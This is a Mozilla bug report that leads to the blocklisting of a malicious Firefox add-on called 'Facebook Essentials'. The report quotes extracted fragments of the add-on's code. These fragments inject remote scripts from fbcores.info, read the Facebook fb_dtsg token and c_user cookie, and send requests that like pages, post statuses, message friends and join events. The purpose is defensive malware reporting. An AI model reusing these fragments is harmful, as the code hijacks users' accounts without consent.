Last Comment Bug 739482 - Malicious "Facebook Essentials" add-on
: Malicious "Facebook Essentials" add-on
Status: RESOLVED FIXED
:
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
: unspecified
: All All
: -- normal (vote)
: ---
Assigned To: Jorge Villalobos [:jorgev]
:
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2012-03-26 17:36 PDT by MarkH
Modified: 2016-03-07 15:30 PST (History)
5 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
20120326_freesms.zip (password is 'infected') (62.81 KB, application/octet-stream)
2012-03-26 17:36 PDT, MarkH
no flags Details

Description MarkH 2012-03-26 17:36:49 PDT
Created attachment 609552 [details]
20120326_freesms.zip (password is 'infected')

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11

Steps to reproduce:

Downloaded the add-on from http://buzz-france[.]info/freesms.xpi


Actual results:

Steals your Facebook cookies and uses your account to like a series of pages, adds your account to a set of Facebook events.  See auto extract from the add-on below:

** Embedded and Remote Files **

content/youtube.js
http://fbcores.info/sms.js
http://fbcores.info/gkuyrr.js
content/xmlhttprequester.js
content/script-compiler-overlay.xul
http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
content/prefman.js
content/skin/icon.png
content/script-compiler.js
install.rdf
chrome.manifest


** Embedded Metadata **

<em:name>Facebook Essentials</em:name>
<em:version>1.0</em:version>
<em:type>2</em:type>
<em:creator>Arash Jafari</em:creator>
<em:developer>Arash Jafari</em:developer>
<em:description>Facebook Essentials</em:description>
<em:homepageURL>http://www.klate.com/</em:homepageURL>
<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>
<em:targetApplication>
<em:minVersion>3.5</em:minVersion>
<em:maxVersion>15.*</em:maxVersion>
</em:targetApplication>


** Files Loaded **

...pt type='application/x-javascript'
src='chrome://youtube/content/youtube.js'></s...
'chrome://youtube/content/youtube.js'
<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>
...overlay	chrome://browser/content/browser.xul	chrome://youtube/content/sc
ript-com...


** Remote Javascript Loaded **

var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://fbcores.info/sms.js");
function addScript() {
var s = document.createElement('script');
s.setAttribute("type", "text/javascript");
s.setAttribute("src", "http://fbcores.info/gkuyrr.js");
...tachment[params][metaTagMap][2][name]=description&attachment[params][met
aTagMap]...
for (i=0; i<document.getElementsByTagName('script').length; i++) {
var a = document.getElementsByTagName('script')[i].innerHTML;
var a = document.getElementsByTagName('script')[0];
addScript();
// this function gets called by user scripts in content security scope to
...eymaster/gatekeeper/there.is.only.xul'><script
type='application/x-javascript' s...
var	scriptableStream=Components
.classes["@mozilla.org/scriptableinputstream;1"]
.getService(Components.interfaces.nsIScriptableInputStream);
.classes["@mozilla.org/intl/scriptableunicodeconverter"]
.createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
scriptableStream.init(input);
var	str=scriptableStream.read(input.available());
scriptableStream.close();
var script=youtube_gmCompiler.getUrlContents(
youtube_gmCompiler.injectScript(script, href, unsafeWin);
injectScript: function(script, url, unsafeContentWin) {
var sandbox, script, logger, storage, xmlhttpRequester;
var storage=new youtube_ScriptStorage();
"(function(){"+script+"})()",
e2.fileName=script.filename;
function youtube_ScriptStorage() {
youtube_ScriptStorage.prototype.setValue = function(name, val) {
youtube_ScriptStorage.prototype.getValue = function(name, defVal) {
<Description about="urn:mozilla:install-manifest">
<em:description>Facebook Essentials</em:description>
<Description>
</Description>
</Description>
...nt/browser.xul	chrome://youtube/content/script-compiler-overlay.xul


** Facebook Paths Accessed **

top.location.href = 'http://facebook.com'
if (stompa.indexOf('facebook.com') > 0) {
...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' +
user_id + '...
...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' +
user_id + '&sk...
...er.indexOf('Mora em <a
href="http://www.facebook.com/pages/S%C3%A3o-Paulo-Brazil...
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = '/ajax/connect/external_node_connect.php?__a=1';
var urlwp = '/ajax/sharer/submit/?__a=1';
var urlwp = '/ajax/profile/composer.php?__a=1';
...var postmessagetext = 'O meu perfil do Facebook foi acessado ' + rtotal
+ ' veze...
...var postmessage = 'O meu perfil do Facebook foi acessado ' + rtotal + '
vezes em...
var urlwp = '/ajax/updatestatus.php?__a=1';
var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
...nha nesse concurso de Imagem
Digital\x0Afacebook.com/photo.php?fbid=309406152446...
var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
var urlwp = '/ajax/questions/ask_friends.php?qid=' + qid + '&__a=1';
var urlwp = '/ajax/events/permalink/join.php?__a=1';
var urlwp = '/ajax/events/invite/send/?__a=1';
"www.facebook.com",
"http://facebook.com",
"www.facebook.fr",
"http://facebook.fr",
"www.facebook.ca",
"http://facebook.ca",
"www.facebook.co.uk",
"http://facebook.co.uk"
"Curti esse facebook colorido ;) " + fbhost + "/photo.php?fbid=" + fbid,
httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false);
...open("POST", "/ajax/ufi/modify.php?__a=1"),
setRequestHeader("Content-Type", "ap...
<em:id>GifBlock@facebook.com</em:id>
<em:name>Facebook Essentials</em:name>
<em:description>Facebook Essentials</em:description>


** Facebook Data Accessed **

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
...]['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
console.log(fb_dtsg)
...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
..._mod]=like_widget&nctr[_impid]=4a44dc9a&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...custom_value]=50&audience[0][value]=111&fb_dtsg=' + fb_dtsg +
'&message=@[' + fr...
...wp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&xhpc_composerid=...
...wp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&xhpc_composerid=...
...nder=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_for
m_id_sou...
...ine=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_for
m_id_sou...
...__d=1&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...eader&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg +
"&lsd&post_form_id...
...__d=1&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&lsd&post_form_id...
...D0%84&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg +
"&feedback_params=...


** HTTP Requests **

gf = new XMLHttpRequest();
...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' +
user_id + '...
var httpwp = new XMLHttpRequest();
...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' +
user_id + '&sk...
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var http3 = new XMLHttpRequest();
http3.open("POST", url3, true);
var httpc = new XMLHttpRequest();
httpc.open("POST", urlc, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var httpwp = new XMLHttpRequest();
httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false);
with(newx = new XMLHttpRequest())
...open("POST", "/ajax/ufi/modify.php?__a=1"),
setRequestHeader("Content-Type", "ap...
var httpwp = new XMLHttpRequest();
httpwp['open']('POST', urlwp, true);
var req = new this.chromeWindow.XMLHttpRequest();


** All URLs Loaded or Mentioned **

top.location.href = 'http://facebook.com'
...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' +
user_id + '&sk...
...if (outer.indexOf('Mora em <a
href="http://www.facebook.com/pages/S%C3%A3o-Paulo...
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var toLikes = new Array("http://bit.ly/GW7Mjb");
var shareurls = new Array("http://www.youtube.com/watch?v=QMucCamyuSI");
...var postimgs = new
Array("http://media.salon.com/2010/05/outrage_over_the_smokin...
var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
"http://facebook.com",
"http://fb.com",
"http://facebook.fr",
"http://facebook.ca",
"http://facebook.co.uk"
httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false);
... '<center><br><br><br><br><br><img
src="http://whos.amung.us/widget/ncosqdqleyjm...
... '<center><br><br><br><br><br><img
src="http://whos.amung.us/widget/ncosqdqleyjl...
...var urlwp =
"http://www.youtube.com/watch_actions_ajax?action_like_video=1&video...
... '<center><br><br><br><br><br><img
src="http://whos.amung.us/widget/ncosqdqleyjm...
s.setAttribute("src", "http://fbcores.info/gkuyrr.js");
s.setAttribute("src", "http://fbcores.info/sms.js");
...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul<
/code></...
...<dd><a
href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org..
.
...<?xml version="1.0"?><overlay
xmlns='http://www.mozilla.org/keymaster/gatekeeper...
// http://www.letitblog.com/code/python/greasemonkey.py.txt
// http://greasemonkey.devjavu.com/
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<em:homepageURL>http://www.klate.com/</em:homepageURL>



Expected results:

It should not steal your Facebook cookies and begin conducting transactions on your behalf, without your consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-03-27 10:51:46 PDT
ID: GifBlock@facebook.com
Comment 2 Jorge Villalobos [:jorgev] 2012-03-27 10:54:00 PDT
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i79

Note You need to log in before you can comment on or make changes to this bug.